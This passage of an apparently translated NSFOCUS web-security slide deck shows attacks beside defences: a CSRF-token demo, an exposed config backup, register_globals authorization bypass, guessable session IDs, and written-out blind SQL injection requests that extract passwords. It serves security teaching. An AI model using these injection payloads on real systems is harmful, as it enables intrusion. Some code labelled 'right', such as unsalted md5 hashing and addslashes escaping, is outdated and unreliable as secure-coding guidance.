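    if (empty($session['csrf']) || !isset($post['csrf']) || !is_string($post['csrf'])) {
        return false;
    }
    return hash_equals($session['csrf'], $post['csrf']); // constant-time comparison
}

// The state-changing handler: a request that carries the victim's cookie but no
// matching token (the cross-site case) is refused before anything is stored.
function handle_post(array $session, array $post, array &$forum): string
{
    if (!csrf_check($session, $post)) {
        return 'rejected: missing or wrong CSRF token';
    }
    $forum[] = ['subject' => $post['subject'] ?? '', 'content' => $post['content'] ?? ''];
    return 'stored';
}

// Constructed walkthrough. $victim stands for the logged-in user's session and
// $forum for the message table.
$victim = ['user' => 'aa'];
$forum = [];
$form = csrf_field($victim); // the page served to the victim embeds the token

// 1. Forged request from the attacker's page: the cookie rides along, the token does not.
echo handle_post($victim, ['subject' => 'Free Olympic tickets!!!', 'content' => '<script>attack code</script>'], $forum), "\n";
// 2. A guessed token.
echo handle_post($victim, ['csrf' => str_repeat('0', 64), 'subject' => 'x', 'content' => 'y'], $forum), "\n";
// 3. The victim's own submission carries the token from the served form.
echo handle_post($victim, ['csrf' => $victim['csrf'], 'subject' => 'hello', 'content' => 'hi'], $forum), "\n";
echo count($forum), " message(s) stored\n";
```

The token only helps once the stored-XSS problem from the earlier slides is fixed, since script running inside the page can read it from the form.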
    • 86. Intrusion Techniques Exchange: Defending Against Configuration Errors
    • 87. Backup file left in the web root (diagram: Web Server, Attacker): Get /config/horde.php.bak returns
      ...
      $conf['prefs']['driver'] = 'sql';
      $conf['prefs']['params'] = array();
      $conf['prefs']['params']['phptype'] = 'mysql';
      $conf['prefs']['params']['hostspec'] = 'foo.bar';
      $conf['prefs']['params']['username'] = 'root';
      $conf['prefs']['params']['password'] = 'blabla';
      $conf['prefs']['params']['database'] = 'horde';
      $conf['prefs']['params']['table'] = 'horde_prefs';
      ...
    • 88. Wrong
    • 89. Right
    • 90. Must (php.ini):
      register_globals: Off
      allow_url_fopen: Off
      magic_quotes_gpc: Off
      magic_quotes_runtime: Off
      safe_mode: On
      open_basedir: On
      display_errors = off
      log_errors = on
      error_log = /var/log/php.log
      register_globals = off
      session.use_trans_sid = 0
      open_basedir = /servers/www/foo.bar/
      expose_php = off
    • 91. Intrusion Techniques Exchange: Defending Against Authentication Vulnerabilities
    • 92. (diagram: Attacker, Web Server) Get /login.php → login form (Username: / Password: / OK / Cancel); Post wrong username or passwd → "wrong username or password"; Get /script.php?authorized=1 → Success login in…
    • 93. Wrong:
      <?php
      if (authenticated_user()) {
          $authorized = true;
      }
      if ($authorized) {
          include '/highly/sensitive/data.php';
      }
      ...
      ?>
      Right:
      <?php
      $_SESSION['authenticated'] = false;
      if (authenticate_user()) {
          $_SESSION['authenticated'] = true;
      }
      if (!$_SESSION['authenticated']) {
          die("Authorization required");
      }
      ...
      ?>
    • 94. Better:
      <?php
      $_SESSION['authenticated'] = false;
      if (authenticate_user()) {
          $_SESSION['authenticated'] = true;
      }
      if (!$_SESSION['authenticated']) {
          mail("admin@example.com", "Possible breakin attempt", $_SERVER['REMOTE_ADDR']);
          echo "Security violation, Admin has been alerted.";
          exit;
      }
      ...
      ?>
      Advise: register_globals = off
      And: error_reporting(E_ALL);
    • 95. Wrong:
      <?php
      if (!isset($_SESSION['session_id'])) {
          $_SESSION['session_id'] = 1;
      } else {
          $_SESSION['session_id']++;
      }
      print "we can guess it";
      ?>
      Right:
      <?php
      session_start();
      if (!isset($_SESSION['session_id'])) {
          $_SESSION['session_id'] = 1;
      } else {
          session_regenerate_id();
      }
      print "we can guess it";
      ?>
    • 96. Intrusion Techniques Exchange: Defending Against Storage Flaws
    • 97. Blind injection against a plaintext password (MSSQL SERVER!!; diagram: Attacker, Web Server):
      Get /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,1,1)='a')  → TRUE
      Get /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(password,2,1)='r')  → FALSE
      … 1. identify the injection point 2. probe the database structure (table admin, column username...) 3. probe the username and password length 4. probe the password: the password is admin@#$%!
    • 98. The same injection against a hashed password:
      Get /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(username,1,1)='1')  → TRUE
      Get /query.asp?name=admin and 1=(select count(*) from admin where id=1 and mid(username,2,1)='r')  → FALSE
      … 4. probe the password: only the hash value 120a1b2649c88aef29edd2ffd7359d73 is obtained
    • 99. Exposed database file (diagram: Web Server, Attacker): Get /config/database.mdb → Database.mdb: Username | password: Admin | admin@#$%! …
    • 100. Get /config/database.mdb → Database.mdb: Username | password: Admin | 120a1b2649c88aef29edd2ffd7359d73 …
    • 101. Wrong: admin@#$%!  Right: 0x120a1b2649c88aef29edd2ffd7359d73
    • 102. Right:
      <?php
      // store the password hash
      $query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", addslashes($username), md5($password));
      $result = pg_query($connection, $query);
      // send a query to verify the user's password
      $query = sprintf("SELECT 1 FROM users WHERE name='%s' AND pwd='%s';", addslashes($username), md5($password));
      $result = pg_query($connection, $query);
      if (pg_num_rows($result) <= 0) {
          echo "Authentication failed for $username.";
      }
      ?>
    • 103. Cookie: md5(uniqid(rand(), true)) is better than md5(uniqid(rand()))
    • 104. Session: php.ini session.save_path
    • 105. Attack Techniques Exchange: Defending HTTP Data Transmission
    • 106. (diagram: Client, Web Server) Post Forum Message: Username: aa Password: aa_passwd → "Login successful, welcome aa…"
    • 107. (diagram: Attacker, Client, Web Server) The attacker on the path sees both the forum login (Username: aa Password: aa_passwd) and the reply "Login successful, welcome aa…" in the clear.
    • 108. (diagram: Attacker, Client, Web Server, WAP) The same forum login (Username: aa Password: aa_passwd → "Login successful, welcome aa…"), but the attacker captures only qfw2k3vkei5vinev faj2fk42iio 9fj1kjfajffj fkajlkfiefi2hffkfkff.
    • 109. (diagram: Client, Web Server) Post Forum Message: Username: aa Password: aa_passwd → "Login successful, welcome aa…"
    • 110. (diagram: Client, Web Server, a second client infected with an ARP virus) The infected client intercepts the forum login (Username: aa Password: aa_passwd) and inserts <script> evil code </script> into the traffic.
    • 111. Evil: Attacked! The client receives "Login successful, welcome aa…" together with the <script>evil code</script> inserted by the ARP-infected client.
    • 112. Intrusion Techniques Exchange: Defending Against Access Control Flaws
    • 113. (diagram: Client, Web Server) Get /afalkjfla/admin123.php → "Logged in to the admin interface, welcome home admin…"
    • 114. As on slide 60: 1. identify the injection point 2. probe the password length (MYSQL SERVER!!, 13 characters) 3. probe the password (ilovepassword):
      Get /query.asp?name=joe' and LEFT(password,1)='m  → FALSE
      Get /query.asp?name=joe' and LEFT(password,1)='i  → TRUE
      Get /query.asp?name=joe' and LEFT(password,2)='f  → FALSE
    • 115. Same as slide 114, then 4. find the backend login page
    • 116. Intrusion Techniques Exchange: Defending in the Web 2.0 Era
    • 117. Web 1.0: user client (browser: HTML+CSS) → HTTP REQ → web server → database
      Web 2.0: user client (browser: HTML+CSS, JavaScript, Ajax) → XML HTTP REQ → web or XML server → database
    • 118. Open API, vulnerable: <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
    • 119. Attack / Defence
    • 120. register_globals, magic_quotes, safe_mode, PHP … (the efforts of the open-source community); the efforts of security vendors; the efforts of software vendors: Microsoft, Google, NSFOCUS; Aurora (极光), the leader in vulnerability protection
    • 121. NSFOCUS professional services: code audit service, penetration testing service
    • 122. Code audit service: the NSFOCUS security team audits source code with white-box testing, finds programming defects, and provides improvement suggestions and secure-coding best practices. Example finding:
      <?php
      $query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", $username, $password);
      $result = pg_query($connection, $query);
      // send a query to verify the user's password
      $query = sprintf("SELECT 1 FROM users WHERE name='%s' AND pwd='%s';", $username, $password);
      $result = pg_query($connection, $query);
      if (pg_num_rows($result) <= 0) {
          echo "Authentication failed for $username.";
      }
      ?>
    • 123. Code audit service: the corrected code:
      <?php
      $query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", addslashes($username), md5($password));
      $result = pg_query($connection, $query);
      // send a query to verify the user's password
      $query = sprintf("SELECT 1 FROM users WHERE name='%s' AND pwd='%s';", addslashes($username), md5($password));
      $result = pg_query($connection, $query);
      if (pg_num_rows($result) <= 0) {
          echo "Authentication failed for $username.";
      }
      ?>
    • 124. Penetration testing service: the NSFOCUS Pen-test Team uses a variety of techniques and methods to simulate attacks against the devices designated and authorized by the customer, validates the current protective measures, identifies risk points and provides valuable security recommendations. (Pentest Pentest Pentest …; Pen-test Team → Web Server: Succeed Succeed Succeed)
    • 125. This ad space is for rent. Contact 68730606-8502. Interviews in order of bid…
    • 126.  
    • 127. Professional Security Solution Provider Thanks!